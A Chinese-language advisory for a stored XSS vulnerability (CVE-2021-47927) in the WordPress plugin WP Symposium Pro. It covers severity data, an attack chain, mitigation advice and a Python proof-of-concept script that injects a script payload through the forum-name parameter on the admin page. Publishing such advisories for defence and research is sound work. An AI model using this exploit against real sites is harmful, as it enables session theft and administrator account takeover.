CVE-2021-47927: WP Symposium Pro存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2021-47927

漏洞类型

存储型跨站脚本

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Plugin WP Symposium Pro

漏洞概述

WordPress插件WP Symposium Pro 2021.10存在存储型XSS漏洞。因论坛名称参数清理不足，经过身份验证的攻击者可向管理设置页面提交包含恶意JavaScript的POST请求。载荷存储在wps_admin_forum_add_name参数中，当论坛被访问时触发脚本执行。

技术细节

该漏洞发生在WP Symposium Pro插件的论坛管理功能中。系统未对`wps_admin_forum_add_name`参数进行充分的安全过滤，导致攻击者能够注入持久化的恶意脚本。攻击者需首先获得网站的低权限账户，随后向管理员设置页面构造并发送特制的POST数据包。由于后端直接将未转义的数据写入数据库，当管理员或其他用户在浏览器中加载包含该论坛名称的页面时，存储的JavaScript代码将自动运行。此漏洞可被用于窃取管理员Cookie、会话ID或进行钓鱼攻击，从而完全接管管理员账户。

攻击链分析

STEP 1

侦察

识别目标网站是否安装了WP Symposium Pro插件及其版本。

STEP 2

获取凭证

攻击者注册或获取一个低权限的用户账户。

STEP 3

漏洞利用

构造包含XSS Payload的POST请求发送至admin setup页面，利用wps_admin_forum_add_name参数注入恶意代码。

STEP 4

触发执行

当管理员或用户访问受污染的论坛页面时，恶意脚本在浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
target_url = "http://target.com/wp-admin/admin.php?page=wps_forum_setup"

# Authentication cookies (required)
cookies = {
    "wordpress_logged_in_example": "session_cookie_value"
}

# Malicious payload for Stored XSS
payload = "<img src=x onerror=alert('XSS')>"

# Data to be sent in the POST request
data = {
    "wps_admin_forum_add_name": payload,
    "wps_admin_forum_add_slug": "exploited_forum",
    "action": "add"
}

# Send the exploitation request
response = requests.post(target_url, data=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Payload sent successfully. XSS triggered on page visit.")
else:
    print("[-] Failed to send payload.")

影响范围

WP Symposium Pro 2021.10

防御指南

临时缓解措施

建议立即更新插件以修复此漏洞。如果暂时无法更新，应严格限制对论坛管理功能的访问权限，仅允许可信管理员操作，并使用WAF检测和拦截包含恶意脚本特征的请求。